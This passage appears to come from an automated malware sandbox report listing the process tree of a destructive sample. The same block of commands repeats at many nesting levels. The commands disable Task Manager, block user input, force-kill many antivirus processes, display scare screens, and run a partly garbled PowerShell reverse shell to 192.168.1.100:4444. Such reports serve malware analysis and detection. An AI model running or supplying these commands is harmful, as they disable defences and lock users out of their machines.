        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mv30si2u\mv30si2u.cmdline"
        14⤵
        
        PID:2620
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC9B8.tmp" "c:\Users\Admin\AppData\Local\Temp\mv30si2u\CSC7CEC865CE543452CBCAEA943F64C0.TMP"
        15⤵
        
        PID:2980
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        13⤵
        
        PID:3688
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        13⤵
        
        PID:1572
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d21geiwf\d21geiwf.cmdline"
        14⤵
        
        PID:5312
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE1D.tmp" "c:\Users\Admin\AppData\Local\Temp\d21geiwf\CSC60CB1A0E348A4D939C2B6EDBDDFB5EB1.TMP"
        15⤵
        
        PID:5416
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        13⤵
        
        PID:5704
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        13⤵
        
        PID:7556
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        13⤵
        Kills process with taskkill
        
        PID:5236
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        13⤵
        Kills process with taskkill
        
        PID:6320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        13⤵
        
        PID:7632
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        13⤵
        
        PID:4332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        13⤵
        Kills process with taskkill
        
        PID:7384
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        13⤵
        Kills process with taskkill
        
        PID:5280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        13⤵
        Kills process with taskkill
        
        PID:3488
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        13⤵
        Kills process with taskkill
        
        PID:6988
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        13⤵
        Kills process with taskkill
        
        PID:5828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        13⤵
        Kills process with taskkill
        
        PID:8020
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        13⤵
        
        PID:5252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        13⤵
        Kills process with taskkill
        
        PID:7452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        13⤵
        
        PID:6444
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2x53ywuk\2x53ywuk.cmdline"
        14⤵
        
        PID:5392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        11⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1892
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\arqem50b\arqem50b.cmdline"
        12⤵
        
        PID:4400
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        11⤵
        
        PID:3692
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5tv2u4q1\5tv2u4q1.cmdline"
        12⤵
        
        PID:1952
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC4D6.tmp" "c:\Users\Admin\AppData\Local\Temp\5tv2u4q1\CSC359DF835B7B1491CA6C1179316236DC1.TMP"
        13⤵
        
        PID:5048
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        11⤵
        
        PID:3124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        11⤵
        
        PID:2448
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\z3gu5ywn\z3gu5ywn.cmdline"
        12⤵
        
        PID:1260
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA16.tmp" "c:\Users\Admin\AppData\Local\Temp\z3gu5ywn\CSC80299CE295BD438285FFD895F1D91F1C.TMP"
        13⤵
        
        PID:4368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        11⤵
        
        PID:2504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        11⤵
        
        PID:2716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        11⤵
        
        PID:6136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        11⤵
        Kills process with taskkill
        
        PID:6488
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        11⤵
        Kills process with taskkill
        
        PID:7412
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        11⤵
        
        PID:7740
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        11⤵
        
        PID:6772
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        11⤵
        Kills process with taskkill
        
        PID:4332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        11⤵
        Kills process with taskkill
        
        PID:6156
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        11⤵
        
        PID:5780
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        11⤵
        
        PID:2916
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        11⤵
        Kills process with taskkill
        
        PID:6244
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        11⤵
        Kills process with taskkill
        
        PID:5400
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        11⤵
        
        PID:3292
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        11⤵
        
        PID:3120
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\iwg0uksm\iwg0uksm.cmdline"
        12⤵
        
        PID:8348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        9⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3064
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m1cmr1ng\m1cmr1ng.cmdline"
        10⤵
        
        PID:1228
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        9⤵
        
        PID:1748
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5mcr3q4f\5mcr3q4f.cmdline"
        10⤵
        
        PID:4340
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC294.tmp" "c:\Users\Admin\AppData\Local\Temp\5mcr3q4f\CSC63BD3477E5494E1A922FCA4BC3D88A28.TMP"
        11⤵
        
        PID:5108
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        9⤵
        
        PID:1752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        9⤵
        
        PID:1792
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\npxougud\npxougud.cmdline"
        10⤵
        
        PID:2312
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6BB.tmp" "c:\Users\Admin\AppData\Local\Temp\npxougud\CSCBC1AA32E8973432095781A1F74912F66.TMP"
        11⤵
        
        PID:968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        9⤵
        
        PID:4576
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        9⤵
        
        PID:3064
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        9⤵
        
        PID:7956
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        9⤵
        
        PID:7228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        9⤵
        Kills process with taskkill
        
        PID:6948
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8028
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        9⤵
        
        PID:1228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        9⤵
        Kills process with taskkill
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        9⤵
        
        PID:7952
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        9⤵
        Kills process with taskkill
        
        PID:8000
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        9⤵
        
        PID:6804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        9⤵
        
        PID:8040
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        9⤵
        
        PID:7820
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        9⤵
        Kills process with taskkill
        
        PID:7452
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        9⤵
        
        PID:7100
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        9⤵
        
        PID:8036
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nocgx2q5\nocgx2q5.cmdline"
        10⤵
        
        PID:8128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2392
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pd4i15we\pd4i15we.cmdline"
        8⤵
        
        PID:1376
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        7⤵
        
        PID:724
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3ltw2ifj\3ltw2ifj.cmdline"
        8⤵
        
        PID:928
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBEBC.tmp" "c:\Users\Admin\AppData\Local\Temp\3ltw2ifj\CSCBEE83B9D7B054B13A5AE4DACD033D719.TMP"
        9⤵
        
        PID:5000
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:1316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        7⤵
        
        PID:4084
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dtlkoj4w\dtlkoj4w.cmdline"
        8⤵
        
        PID:2620
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2A4.tmp" "c:\Users\Admin\AppData\Local\Temp\dtlkoj4w\CSCFA8DAAB0664E6BB21356573E313AB8.TMP"
        9⤵
        
        PID:2532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        7⤵
        
        PID:968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        7⤵
        
        PID:2680
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        7⤵
        
        PID:7220
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        7⤵
        
        PID:7344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        7⤵
        
        PID:7516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        7⤵
        
        PID:7212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        7⤵
        Kills process with taskkill
        
        PID:5560
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        7⤵
        
        PID:7968
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        7⤵
        Kills process with taskkill
        
        PID:1300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        7⤵
        Kills process with taskkill
        
        PID:7632
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        7⤵
        
        PID:7680
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        7⤵
        
        PID:7384
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        7⤵
        
        PID:5900
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        7⤵
        Kills process with taskkill
        
        PID:6320
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        7⤵
        
        PID:5596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        7⤵
        
        PID:5628
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\02c31ymf\02c31ymf.cmdline"
        8⤵
        
        PID:6760
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1364
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u3egcqba\u3egcqba.cmdline"
        6⤵
        
        PID:5004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3320
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d00rv2eg\d00rv2eg.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1632
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESACF9.tmp" "c:\Users\Admin\AppData\Local\Temp\d00rv2eg\CSC5F745B3CA2374BC9AE6BAE27541BF2E8.TMP"
        7⤵
        
        PID:3524
    - - C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        
        PID:3560
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1020
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cfuffori\cfuffori.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3268
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAF6A.tmp" "c:\Users\Admin\AppData\Local\Temp\cfuffori\CSC411A0DE3E9004BD79E5E7D31AAA8CBA2.TMP"
        7⤵
        
        PID:2716
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4760
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        5⤵
        
        PID:1892
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        5⤵
        
        PID:6008
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5360
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5628
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        5⤵
        
        PID:1504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5928
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        5⤵
        Kills process with taskkill
        
        PID:5796
